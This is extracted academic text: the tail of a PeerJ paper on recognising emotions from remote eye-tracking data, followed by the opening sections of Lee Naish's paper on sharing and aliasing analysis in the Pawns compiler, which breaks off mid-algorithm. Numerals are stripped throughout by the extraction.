decreased (smaller than average) pupil’s size and a smaller distribution of the attention concentration maps. a ‘‘neutral’’ emotional state was recognized worst with a ± . % recognition error. compared to our previous works (raudonis et al., ; raudonis, ) where a close- to-eye gaze-tracker (mounted on glasses) and a comparable method of testing/algorithm was used, we have achieved a comparable result. recognition accuracy also ranged in the interval from to %, depending on a specific person and a certain emotion. a somewhat better recognition accuracy of the current remote eye tracker could also be contributed to an improved algorithm and (likely) to different hardware. the future possibility of accurately determining an emotion without per-user gaze- tracker pre-calibration is very daunting (wang, wang & ji, ; alnajar et al., ). in a person independent mode we were able to achieve the best overall accuracy of . ± . % using samples. ongoing investigation will naturally involve the rest of the main emotion group, and possibly other classification algorithms and methods. we are going to combine visual/audio stimuli with things you can touch and smell to better provoke the effect. we also aim at revisiting our previous experiments with a close-to-eye gaze-tracker to verify if renewed algorithms have had a noticeable effect on the overall recognition accuracy. acknowledgements authors would like to thank giedre dregvaite for organizational help and administrative support over the course of experiments. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • rytis maskeliunas and vidas raudonis conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): research on human subjects was approved by an institutional review board of kaunas university of technology (document # - - ). data availability the following information was supplied regarding data availability: the raw data has been supplied as data s . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references al-omar d. . emotional intelligence screening: detecting emotional arousal in non- communicative individuals. msc report. college of computer and information sciences, king saud university. al-omar d, al-wabil a, fawzi m. . using pupil size variation during visual emo- tional stimulation in measuring affective states of non communicative individuals. in: universal access in human-computer interaction. user and context diversity. lecture notes in computer science, vol. . berlin heidelberg: springer, – . alnajar f, gevers t, valenti r, ghebreab s. . calibration-free gaze estimation using human gaze patterns. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . bal e, harden e, lamb d, van hecke av, denver jw, porges sw. . emotion recognition in children with autism spectrum disorders: relations to eye gaze and autonomic state. journal of autism and developmental disorders ( ): – . beatty j, lucero-wagoner b. . the pupillary system. cambridge: cambridge university press, – . maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. bee n, andré e, tober s. . breaking the ice in human-agent communication: eye- gaze based initiation of contact with an embodied conversational agent. in: lecture notes in computer science, vol. . berlin heidelberg: springer, – . budimir s, palmovic m. . gaze differences in processing pictures with emotional content. collegium antropologicum ( ): – . calandra dm, di mauro d, d’auria d, cutugno f. . e.y.e. c. u.: an emotional eye tracker for cultural heritage support. in: empowering organizations. lecture notes in information systems and organisation, vol. . berlin heidelberg: springer, – . calvo mg, lang pj. . gaze patterns when looking at emotional pictures: motivation- ally biased attention. motivation and emotion ( ): – doi . /b:moem. . .ed. christianson sa, loftus ef, hoffman h, loftus gr. . eye fixations and memory for emotional events. journal of experimental psychology: learning, memory, and cognition ( ): – doi . / - . . . . d’mello s, olney a, williams c, hays p. . gaze tutor: a gaze-reactive intelligent tutoring system. international journal of human-computer studies ( ): – doi . /j.ijhcs. . . . duque a, sanchez a, vazquez c. . gaze-fixation and pupil dilation in the processing of emotional faces: the role of rumination. cognition and emotion ( ): – doi . / . . . ekman p. . basic emotions. in: dalgleish t, power t, eds. (pdf). the handbook of cognition and emotion. sussex: john wiley & sons, ltd., – . hess eh. . the tell-tale eye: how your eyes reveal hidden thoughts and emotions. oxford: van nostrand reinhold, p. iskander dr, collins mj, mioschek s, trunk m. . automatic pupillometry from digital images. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . kappas a, krämer nc. . face-to-face communication over the internet: emotions in a web of culture, language, and technology (studies in emotion and social interaction). cambridge: cambridge university press, p. kuhn g, tipples j. . increased gaze following for fearful faces. it depends on what you’re looking for! psychonomic bulletin & review ( ): – doi . /s - - - . lanatà a, valenza g, scilingo ep. . eye gaze patterns in emotional pictures. journal of ambient intelligence and humanized computing ( ): – doi . /s - - - . lance bj, marsella sc. . a model of gaze for the purpose of emotional expression in virtual embodied agents. in: proceedings of the th international joint conference on autonomous agents and multiagent systems, vol. , – . lu h, lu s, yang g. . robust eye tracking in video sequence. journal of circuits, systems, and computers ( ): – . maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /b:moem. . .ed http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. murphya na, isaacowitza dm. . age effects and gaze patterns in recognising emotional expressions: an in-depth look at gaze measures and covariates. cognition and emotion. ( ): – doi . / . nguyen ht, isaacowitz dm, rubin pa. . age- and fatigue-related markers of human faces: an eye-tracking study. ophthalmology ( ): – doi . /j.ophtha. . . . nummenmaa l, hyönä j, calvo mg. . eye movement assessment of selective attentional capture by emotional pictures. emotion ( ): – . plutchik r. . the nature of emotions. american scientist : – . raudonis v. . agne paulauskaite-taraseviciene, rytis maskeliunas., vision enhance- ment technique based on eye tracking system. in: exploring the abyss of inequalities. communications in computer and information science, vol. , – . raudonis v, dervinis g, vilkauskas a, kersulyte g. . evaluation of human emotion from eye motions. ijacsa ( ): – . ringeval f, sonderegger a, noris b, billard a, sauer j, lalanne d. . on the influence of emotional feedback on emotion awareness and gaze behavior affective computing and intelligent interaction. in: humaine association conference on affective computing and intelligent interaction (acii). – . roche l, roche b. . seeing people eye to eye. the tampa tribune. available at http://www.highlandstoday.com/news/agri-leader/ /oct/ /seeing-people-eye- eye-ar- / . soleymani m, lichtenauer j, pun t, pantic m. . a multimodal database for affect recognition and implicit tagging. affective computing, ieee transactions on ( ): – doi . /t-affc. . . soleymani m, pantic m, pun t. . multimodal emotion recognition in response to videos. affective computing, ieee transactions on ( ): – doi . /t-affc. . . stanley jt, zhang x, fung hh, isaacowitz dm. . cultural differences in gaze and emotion recognition: americans contrast more than chinese. emotion ( ): – doi . /a . tubbs s. . human communication: principles and contexts. th edition. new york: mcgraw-hill, p. urry hl. . seeing, thinking, and feeling: emotion-regulating effects of gaze-directed cognitive reappraisal. emotion ( ): – doi . /a . viola p, jones mj. . robust real-time face detection. international journal of cumputer vision ( ): – doi . /b:visi. . .fb. wang k, wang s, ji q. . deep eye fixation map learning for calibration-free eye gaze tracking. in: proceedings of the ninth biennial acm symposium on eye tracking research & applications. new york: acm, – . maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /j.ophtha. . . http://www.highlandstoday.com/news/agri-leader/ /oct/ /seeing-people-eye-eye-ar- / http://www.highlandstoday.com/news/agri-leader/ /oct/ /seeing-people-eye-eye-ar- / http://dx.doi.org/ . /t-affc. . http://dx.doi.org/ . /t-affc. . http://dx.doi.org/ . /a http://dx.doi.org/ . /a http://dx.doi.org/ . /b:visi. . .fb http://dx.doi.org/ . /peerj-cs. sharing analysis in the pawns compiler submitted march accepted august published september corresponding author lee naish, lee@unimelb.edu.au academic editor evelyn duesterwald additional information and declarations can be found on page doi . /peerj-cs. copyright naish distributed under creative commons cc-by . open access sharing analysis in the pawns compiler lee naish computing and information systems, university of melbourne, melbourne, australia abstract pawns is a programming language under development that supports algebraic data types, polymorphism, higher order functions and “pure” declarative programming. it also supports impure imperative features including destructive update of shared data structures via pointers, allowing significantly increased efficiency for some operations. a novelty of pawns is that all impure “effects” must be made obvious in the source code and they can be safely encapsulated in pure functions in a way that is checked by the compiler. execution of a pure function can perform destructive updates on data structures that are local to or eventually returned from the function without risking modification of the data structures passed to the function. this paper describes the sharing analysis which allows impurity to be encapsulated. aspects of the analysis are similar to other published work, but in addition it handles explicit pointers and destructive update, higher order functions including closures and pre- and post-conditions concerning sharing for functions. subjects programming languages keywords functional programming language, algebraic data type, destructive update, mutability, effects, aliasing analysis, sharing analysis introduction this paper describes the sharing analysis done by the compiler for pawns (naish, ), a programming language that is currently under development. pawns supports both declarative and imperative styles of programming. it supports algebraic data types, polymorphism, higher order programming and “pure” declarative functions, allowing very high level reasoning about code. it also allows imperative code, where programmers can consider the representation of data types, obtain pointers to the arguments of data constructors and destructively update them. such code requires the programmer to reason at a much lower level and consider aliasing of pointers and sharing of data structures. low level “impure” code can be encapsulated within a pure interface and the compiler checks the purity. this requires analysis of pointer aliasing and data structure sharing, to distinguish data structures that are only visible to the low level code (and are therefore safe to update) from data structures that are passed in from the high level code (for which update would violate purity). the main aim of pawns is to get the benefits of purity for most code but still have the ability to write some key components using an imperative style, which can significantly improve efficiency (for example, a more than twenty-fold increase in the speed of inserting an element into a binary search tree). there are other functional programming languages, such as ml (milner, tofte & macqueen, ), haskell (jones et al., ) and disciple (lippmeier, ), that allow destructive update of shared data structures but do not allow this impurity to be how to cite this article naish ( ), sharing analysis in the pawns compiler. peerj comput. sci. :e ; doi . /peerj-cs. mailto:lee@unimelb.edu.au https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. encapsulated. in these languages, the ability to update the data structure is connected to its type. for a data structure to be built using destructive update, its type must allow disciple uses “region” information to augment types, with similar consequences. destructive update and any code that uses the data structure can potentially update it as well. this prevents simple declarative analysis of the code and can lead to a proliferation of different versions of a data structure, with different parts being mutable. for example, there are four different versions of lists, since both the list elements and the “spine” may (or may not) be mutable, and sixteen different versions of lists of pairs. there is often an efficiency penalty as well, with destructive update requiring an extra level of indirection in the data structure (an explicit “reference” in the type with most versions of ml and haskell). pawns avoids this inefficiency and separates mutability from type information, allowing a data structure to be mutable in some contexts and considered “pure” in others. the main cost from the programmer perspective is the need to include extra annotations and information in the source code. this can also be considered a benefit, as it provides useful documentation and error checking. the main implementation cost is additional analysis done by the compiler, which is the focus of this paper. the rest of this paper assumes some familiarity with haskell and is structured as follows. ‘an overview of pawn’ gives a brief overview of the relevant features of pawns. an early pass of the compiler translates pawns programs into a simpler “core” language; this is described in ‘core pawns.’ ‘the abstract domain’ describes the abstract domain used for the sharing analysis algorithm, ‘the sharing analysis algorithm’ defines the algorithm itself and ‘example’ gives an extended example. ‘discussion’ briefly discusses precision and efficiency issues. ‘related work’ discusses related work and ‘conclusion’ concludes. an overview of pawns a more detailed introduction to pawns is given in (naish, ). pawns has many similarities with other functional languages. it supports algebraic data types with parametric polymorphism, higher order programming and curried function definitions. it uses strict evaluation. in addition, it supports destructive update via “references” (pointers) and has a variety of extra annotations to make impure effects more clear from the source code and allow them to be encapsulated in pure code. pawns also supports a form of global variables (called state variables) which support encapsulated effects, but we do not discuss them further here as they are handled in essentially the same way as other variables in sharing analysis. pure code can be thought of in a declarative way, where values can be viewed abstractly, without considering how they are represented. code that uses destructive update must be viewed at a lower level, considering the representation of values, including sharing. we discuss this lower level view first, then briefly present how impurity can be encapsulated to support the high level view. we use haskell-like syntax for familiarity. the low level view values in pawns are represented as follows. constants (data constructors with no arguments) are represented using a value in a single word. a data constructor with n > arguments is represented using a word that contains a tagged pointer to a block of n words naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in main memory containing the arguments. for simple data types such as lists, the tag may be empty. in more complex cases, some bits of the pointer may be used and/or a tag may be stored in a word in main memory along with the arguments. note that constants and tagged pointers are not always stored in main memory and pawns variables may correspond to registers that contain the value. only the arguments of data constructors are guaranteed to be in main memory. an array of size n is represented in the same way as a data constructor with n arguments, with the size given by the tag. functions are represented as either a constant (for functions that are known statically) or a closure which is a data constructor with a known function and a number of other arguments. pawns has a ref t type constructor, representing a reference/pointer to a value of type t (which must be stored in memory). conceptually, we can think of a corresponding ref data constructor with a single argument, but this is never explicit in pawns code. instead, there is an explicit dereference operation: *vp denotes the value vp points to. there are two ways references can be created: let bindings and pattern bindings. a let binding *vp = val allocates a word in main memory, initializes it to val and makes vp a reference to it (pawns omits haskell’s let and in keywords; the scope is the following sequence of statements/expressions). in a pattern binding, if *vp is the argument of a data constructor pattern, vp is bound to a reference to the corresponding argument of the data constructor if pattern matching succeeds (there is also a primitive that returns a reference to the ith element of an array). note it is not possible to obtain a reference to a pawns variable: variables do not denote memory locations. however, a variable vp of type ref t denotes a reference to a memory location containing a value of type t and the memory location can be destructively updated by *vp := val. consider the following code. two data types are defined. the code creates a reference to nil (nil is stored in a newly allocated memory word) and a reference to that reference (a pointer to the word containing nil is put in another allocated word). it also creates a list containing constants blue and red (requiring the allocation of two cons cells in memory; the nil is copied). it deconstructs the list to obtain pointers to the head and tail of the list (the two words in the first cons cell) then destructively updates the head of the list to be red. data colour = red | green | blue data colours = nil | cons colour colours -- like [colour] ... *np = nil -- np = ref to (copy of) nil *npp = np -- npp = ref to (copy of) np cols = cons blue (cons red *np) -- cols = [blue, red] case cols of (cons *headp *tailp) -> -- get ref to head and tail *headp := red -- update head with red naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the memory layout after the assignment can be pictured as follows, where boxes represent main memory words and ref and cons followed by an arrow represent pointers (no tag is used in either case): the destructive update above changes the values of both headp and cols (the representations are shared). one of the novel features of pawns is that the source code must be annotated with “!” to make it obvious when each “live” variable is updated. if both headp and cols are used later, the assignment statement above must be written as follows, with headp prefixed with “!” and an additional annotation attached to the whole statement indicating cols may be updated: *!headp := red !cols -- update *headp (and cols) we say that the statement directly updates headp and indirectly updates cols, due to sharing of representations. similarly, if headp was passed to a function that may update it, additional annotations are required. for example, (assign !headp red) !cols makes the direct update of headp and indirect update of cols clear. sharing analysis is used to ensure that source code contains all the necessary annotations. one aim of pawns is that any effects of code should be made clear by the code. pawns is an acronym for pointer assignment with no surprises. pawns functions have extra annotations in type signatures to document which arguments may be updated. for additional documentation, and help in sharing analysis, there are annotations to declare what sharing may exist between arguments when the function is called (a precondition) and what extra sharing may be added by executing the function (called a postcondition, though it is the union of the pre- and post-condition that must be satisfied after a function is executed). for example, we may have: assign :: ref t -> t -> () sharing assign !p v = _ -- p may be updated pre nosharing -- p&v don’t share when called post *p = v -- assign may make *p alias with v assign !p v = *!p := v the “!” annotation on parameter p declares the first argument of assign is mutable. the default is that arguments are not mutable. as well as checking for annotations on assignments and function calls, sharing analysis is used to check that all parameters which may be updated are declared mutable in type signatures, and pre- and post-conditions are always satisfied. for example, assuming the previous code which binds cols, the call assign !tailp !cols annotates all modified variables but violates the precondition naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. of assign because there is sharing between tailp and cols at the time of the call. violating this precondition allows cyclic structures to be created, which is important for understanding the code. if the precondition was dropped, the second argument of assign would also need to be declared mutable in the type signature and the assignment to p would require v to be annotated. in general, there is an inter-dependence between “!” annotations in the code and pre- and post-conditions. more possible sharing at a call means more “!” annotations are needed, more sharing in (recursive) calls and more sharing when the function returns. curried functions and higher order code are supported by attaching sharing and destructive update information to each arrow in a type, though often the information is inferred rather than being given explicitly in the source code. for example, implicit in the declaration for assign above is that assign called with a single argument of type ref t creates a closure of type t ->() containing that argument (and thus sharing the object of type t). the explicit sharing information describes applications of this closure to another argument. there is a single argument in this application, referred to with the formal parameter v. the other formal parameter, p, refers to the argument of the closure. in general, a type with n arrows in the “spine” has k + n formal parameters in the description of sharing, with the first k parameters being closure arguments. the following code defines binary search trees of integers and defines a function that takes a pointer to a tree and inserts an integer into the tree. it uses destructive update, as would normally be done in an imperative language. the declarative alternative must reconstruct all nodes in the path from the root down to the new node. experiments using our prototype implementation of pawns indicate that for long paths this destructive update version is as fast as hand-written c code whereas the “pure” version is more than twenty times slower, primarily due to the overhead of memory allocation. data tree = tnil | node tree int tree bst_insert_du :: int -> ref tree -> () sharing bst_insert_du x !tp = _ -- tree gets updated pre nosharing -- integers are atomic so post nosharing -- it doesn’t share bst_insert_du x !tp = case *tp of tnil -> *!tp := node tnil x tnil -- insert new node (node *lp n *rp) -> if x <= n then (bst_insert_du x !lp) !tp -- update lp (and tp) else (bst_insert_du x !rp) !tp -- update rp (and tp) naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the high level view whenever destructive update is used in pawns, programmers must be aware of potential sharing of data representations and take a low-level view. in other cases, it is desirable to have a high level view of values, ignoring how they are represented and any sharing that may be present. for example, in the two trees t and t depicted below, it is much simpler if we do not have to care or know about the sharing between the trees and within tree t . the high level view is they are both just node (node tnil tnil) (node tnil tnil). pawns has a mechanism to indicate that the high level view is taken. pre- and post-conditions can specify sharing with a special pseudo-variable named abstract. the there is conceptually a different abstract variable for each distinct type. sharing analysis of the pawns compiler allows a distinction between “abstract” variables, which share with abstract and for which the programmer takes a high level view, and “concrete” variables for which the programmer must understand the representation and explicitly declare all sharing in pre- and post-conditions. the analysis checks that no live abstract variables can be destructively updated. thus, if a function has a parameter which is updated, it must be declared mutable and must not be declared to share with abstract in the precondition (non-mutable parameters may or may not share with abstract). checking of preconditions ensures that abstract variables are not passed to functions which expect concrete data structures. for example, an abstract tree cannot be passed to bst insert du because the precondition allows no sharing with abstract. it is important that the tree structure is known when bst insert du is used because the result depends on it. for example, inserting into the right subtree of t only affects this subtree whereas inserting into the right subtree of t (which has the same high level value) also changes the left subtree of both t and t . note that concrete variables can be passed to functions which allow abstract arguments. pawns type signatures that have no annotations concerning destructive update or sharing implicitly indicate no arguments are destructively updated and the arguments and result share with abstract. thus, a subset of pawns code can look like and be considered as pure functional code. the following code defines a function that takes a list of integers and returns a binary search tree containing the same integers. though it uses destructive update internally, this impurity is encapsulated and it can therefore be viewed as a pure function. the list that is passed in as an argument is never updated and the tree returned is abstract so it is never subsequently updated (a concrete tree could be returned if an explicit postcondition without t = abstract was given). an initially empty tree is created locally. it is destructively updated by inserting each integer of the list into it (using list bst du, which calls bst insert du), then the tree is returned. within the execution of list bst naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. it is important to understand the low level details of how the tree is represented, but this information is not needed outside the call. data ints = nil | cons int ints list_bst :: ints -> tree -- pure function from ints to tree -- implicit sharing information: -- sharing list_bst xs = t -- pre xs = abstract -- post t = abstract list_bst xs = *tp = tnil -- create pointer to empty tree list_bst_du xs !tp -- insert integers into tree *tp -- return (updated) tree list_bst_du :: ints -> ref tree -> () sharing list_bst_du xs !tp = _ -- tree gets updated pre xs = abstract post nosharing list_bst_du xs !tp = case xs of (cons x xs ) -> bst_insert_du x !tp -- insert head of list into tree list_bst_du xs !tp -- insert rest of list into tree nil -> () core pawns an early pass of the pawns compiler converts all function definitions into a core language by flattening nested expressions, introducing extra variables et cetera. a variable represent- ing the return value of the function is introduced and expressions are converted to bindings for variables. a representation of the core language version of code is annotated with type, liveness and other information prior to sharing analysis. we just describe the core language here. the right side of each function definition is a statement (described using the definition of type stat below), which may contain variables, including function names (var), data constructors (dcons) and pairs containing a pattern (pat) and statement for case statements. all variables are distinct except for those in recursive instances of stat and variables are renamed to avoid any ambiguity due to scope. data stat = -- statement, eg seq stat stat | -- stat ; stat eqvar var var | -- v = v eqderef var var | -- v = *v naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. derefeq var var | -- *v = v dc var dcons [var] | -- v = cons v v case var [(pat, stat)] | -- case v of pat -> stat ... error | -- (for uncovered cases) app var var [var] | -- v = f v v assign var var | -- *!v := v instype var var -- v = v ::instance_of_v _type data pat = -- patterns for case, eg pat dcons [var] -- (cons *v *v ) patterns in the core language only bind references to arguments — the arguments themselves must be obtained by explicit dereference operations. pawns supports “default” patterns but for simplicity of presentation here we assume all patterns are covered in core pawns and we include an error primitive. similarly, we just give the general case for application of a variable to n > arguments; our implementation distinguishes some special cases. memory is allocated for derefeq, dc (for non-constants) and app (for unsaturated applications which result in a closure). the runtime behaviour of instype is identical to eqvar but it is treated differently in type analysis. sharing and type analysis cannot be entirely separated. destructive update in the presence of polymorphic types can potentially violate type safety or “preservation”— see wright ( ), for example. for a variable whose type is polymorphic (contains a type variable), we must avoid assigning a value with a less general type. for example, in *x = [] the type of *x is “list of t”, where t is a type variable. without destructive update, it should be possible to use *x wherever a list of any type is expected. however, if *x is then assigned a list containing integers (which has a less general type), passing it to a function that expects a list of functions violates type safety (“calling” an arbitrary integer is not safe). pawns allows expressions to have their inferred types further instantiated using “::”, and the type checking pass of the compiler also inserts some type instantiation. the type checking pass ensures that direct update does not involve type instantiation but to improve flexibility, indirect update is checked during the sharing analysis. the abstract domain the representation of the value of a variable includes some set of main memory words (arguments of data constructors). two variables share if the intersection of their sets of main memory words is not empty. the abstract domain for sharing analysis must maintain a conservative approximation to all sharing, so we can tell if two variables possibly share (or definitely do not share). the abstract domain we use is a set of pairs (representing possibly intersecting sets of main memory locations) of variable components. the different components of a variable partition the set of main memory words for the variable. the components of a variable depend on its type. for non-recursive types other than arrays, each possible data constructor argument is represented separately. for example, the type maybe (maybe (either int int)) can have an argument of an outer just naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. data constructor, an inner just and left and right. a component can be represented using a list of x.y pairs containing a data constructor and an argument number, giving the path from the outermost data constructor to the given argument. for example, the components of the type above can be written as: [just. ], [just. ,just. ], [just. ,just. ,left. ] and [just. ,just. ,right. ]. if variable v has value just nothing, the expression v.[just. ] represents the single main memory word containing the occurrence of nothing. for ref t types we proceed as if there was a ref data constructor, so vp.[ref. ] represents the word vp points to. for function types, values may be closures. a closure that has had k arguments supplied is represented as a data constructor clk with these k arguments; these behave in the same way as other data constructor arguments with respect to sharing, except pawns provides no way to obtain a pointer to a closure argument. closures also contain a code pointer and an integer which are not relevant to sharing so they are ignored in the analysis. we also ignore the subscript on the data constructor for sharing analysis because type and sharing analysis only give a lower bound on the number of closure arguments. our analysis orders closure arguments so that the most recently supplied argument is first (the reverse of the more natural ordering). consider the code below, where foo is a function that is defined with four or more arguments. the sharing analysis proceeds as if the memory layout was as depicted in the diagram. the pre- and post-conditions of foo are part of the type information associated with c , c and c . for arrays, [array . ] is used to represent all words in the array. the expression, x.[array . ,just. ] represents the arguments of all just elements in an array x of maybe values. for recursive types, paths are “folded” (bruynooghe, ) so there are a finite number of components. if a type t has sub-component(s) of type t we use the empty path to denote the sub-component(s). in general, we construct a path from the top level and if we come across a sub-component of type t that is in the list of ancestor types (the top level type followed by the types of elements of the path constructed so far) we just use the path to the ancestor to represent the sub-component. consider the following mutually recursive types that can be used to represent trees which consist of a node containing an integer and a list of sub-trees: data rtrees = nil | cons rtree rtrees data rtree = rnode int rtrees for type rtrees we have the components [] (this folded path represents both [cons. ] and [cons. ,rnode. ], since they are of type rtrees), [cons. ] and [cons. ,rnode. ]. the expression t.[cons. ,rnode. ] represents the set of naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. memory words that are the first argument of rnode in variable t of type rtrees. for type rtree we have the components [] (for [rnode. ,cons. ], of type rtree), [rnode. ] and [rnode. ] (which is also the folded version of [rnode. ,cons. ], of type rtrees). in our sharing analysis algorithm we use a function fc (fold component) which takes a v.c pair, and returns v.c′ where c′ is the correctly folded component for the type of variable v. for example, fc (ts.[cons. ]) = ts.[], assuming ts has type rtrees. as well as containing pairs of components for distinct variables which may alias, the abstract domain contains “self-alias” pairs for each possible component of a variable which may exist. consider the following two bindings and the corresponding diagram (as with cons, no tag is used for rnode): with our domain, the most precise description of sharing after these two bindings is as follows. we represent an alias pair as a set of two variable components. the first five are self-alias pairs and the other two describe the sharing between t and ts. {{t.[rnode. ], t.[rnode. ]}, {t.[rnode. ], t.[rnode. ]}, {ts.[], ts.[]}, {ts.[cons. ], ts.[cons. ]}, {ts.[cons. ,rnode. ], ts.[cons. ,rnode. ]}, {t.[rnode. ], ts.[cons. ,rnode. ]}, {t.[rnode. ], ts.[]}} note there is no self-alias pair for t.[] since there is no strict sub-part of t that is an rtree. similarly, there is no alias between ts.[cons. ] and any part of t. although the value t is used as the first argument of cons in ts, this is not a main memory word that is used to represent the value of t (indeed, the value of t has no cons cells). the tagged pointer value stored in variable t (which may be in a register) is copied into the cons cell. such descriptions of sharing are an abstraction of computation states. the set above abstracts all computation states in which t is a tree with a single node, ts is a list of trees, elements of ts may be t or have t as a subtree, and there are no other live variables with non-atomic values. the sharing analysis algorithm we now describe the sharing analysis algorithm. overall, the compiler attempts to find a proof that for a computation with a depth d of (possibly recursive) function calls, the following condition c holds, assuming c holds for all computations of depth less than d. this allows a proof by induction that c holds for all computations that terminate normally. c: for all functions f , if the precondition of f is satisfied (abstracts the computation state) whenever f is called, then naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. . for all function calls and assignment statements in f , any live variable that may be updated at that point in an execution of f is annotated with “!”, . there is no update of live “abstract” variables when executing f , . all parameters of f which may be updated when executing f are declared mutable in the type signature of f , . the union of the pre- and post-conditions of f abstracts the state when f returns plus the values of mutable parameters in all states during the execution of f , . for all function calls and assignment statements in f , any live variable that may be directly updated at that point is updated with a value of the same type or a more general type, and . for all function calls and assignment statements in f , any live variable that may be indirectly updated at that point only shares with variables of the same type or a more general type. the algorithm is applied to each function definition in core pawns to compute an approximation to the sharing before and after each statement (we call it the alias set). this can be used to check points , , and above. the algorithm checks that preconditions are satisfied for each function call, allowing the induction hypothesis to be used. point is established using point and a simple syntactic check that any parameter of f that is annotated “!” in the definition is declared mutable in the type signature (parameters are considered live throughout the definition). point relies on and the type checking pass. the core of the algorithm is to compute the alias set after a statement, given the alias set before the statement. this is applied recursively for compound statements in a form of abstract execution. note that for point , if a statement changes the set of memory cells used to represent a mutable parameter, the algorithm computes the sharing for the union of the two sets of cells. we do not prove correctness of the algorithm but hope our presentation is sufficiently detailed to have uncovered any bugs. a proof would have a separate case for each kind of statement in the core language, showing that if the initial alias set abstracts the execution state before the statement the resulting alias set abstracts the execution state after the statement. this would require a more formal description of execution states and their relationship with the core language and the abstract domain. the abstract domain relies on type information so the sharing analysis relies on type preservation in the execution. type preservation also relies on sharing analysis. thus, a completely formal approach must tackle both problems together. although our approach is not formal, we do state the key condition c, which has points relating to both sharing and types, and we include instype in the core language. the alias set used at the start of a definition is the precondition of the function. this implicitly includes self-alias pairs for all variable components of the arguments of the function and the pseudo-variables abstractt for each type t used. similarly, the postcondition implicitly includes self-alias pairs for all components of the result (and the abstractt variable if the result is abstract). as abstract execution proceeds, extra self-aliasing for arguments and results is usually desired. for the rare cases it is not, we may provide a mechanism to override this default in the future. naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. variables from the function body are added to the alias set and variables that are no longer live can be removed to improve efficiency. for each program point, the computed alias set abstracts the computation state at that point in all concrete executions of the function that satisfy the precondition. for mutable parameters of the function, the sharing computed also includes the sharing from previous program points. the reason for this special treatment is explained when we discuss the analysis of function application. the alias set computed for the end of the definition, with sharing for local variables removed, must be a subset of the union of the pre- and post-condition of the function. before sharing analysis, a type checking/inference pass is completed which assigns a type to each variable and function application. this determines the components for each variable. polymorphism is also eliminated as follows. suppose we have a function take n xs, which returns the list containing the first n elements of xs: take :: int -> [a] -> [a] sharing take n xs = ys pre nosharing post ys = xs for each call to take, the pre- and post-conditions are determined based on the type of the application. an application to lists of booleans will have two components for each variable whereas an application to lists of lists of booleans will have four. when analysing the definition of take we instantiate type variables such as a above to ref (). this type has a single component which can be shared to represent possible sharing of arbitrary components of an arbitrary type. type checking prevents sharing between non-identical types, such as [a] and [b]. finally, we assume there is no type which is an infinite chain of refs, for example, type refs = ref refs (for which type folding results in an empty component rather than a [ref. ] component; this is not a practical limitation). suppose a is the alias set just before statement s. the following algorithm computes alias(s,a ), the alias set just after statement s. the algorithm structure follows the recursive definition of statements and we describe it using pseudo-haskell, interspersed with discussion. the empty list is written [], non-empty lists are written [a,b,c] or a:b:c:[] and ++ denotes list concatenation. at some points we use high level declarative set comprehensions to describe what is computed and naive implementation may not lead to the best performance. alias (seq stat stat ) a = -- stat ; stat alias stat (alias stat a ) alias (eqvar v v ) a = -- v = v let self = {{v .c ,v .c }|{v .c ,v .c } ∈ a } share = {{v .c ,v.c }|{v .c ,v.c } ∈ a } in a ∪ self ∪ share naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. alias (derefeq v v ) a = -- *v = v let self = {{v .[ref. ],v .[ref. ]}} ∪ {{fc(v .(ref. :c )),fc(v .(ref. :c ))}|{v .c ,v .c } ∈ a } share = {{fc(v .(ref. :c )),v.c }|{v .c ,v.c } ∈ a } in a ∪ self ∪ share sequencing is handled by function composition. to bind a fresh variable v to a variable v , the self-aliasing of v (including aliasing between different components of v ) is duplicated for v and the aliasing for each component of v (which includes self-aliasing) is duplicated for v . binding *v to v is done in a similar way, but the components of v must have ref. prepended to them and the result folded, and the [ref. ] component of v self-aliases. folding is only needed for the rare case of types with recursion through ref. alias (assign v v ) a = -- *v := v let -- al = possible aliases for v .[ref. ] al = 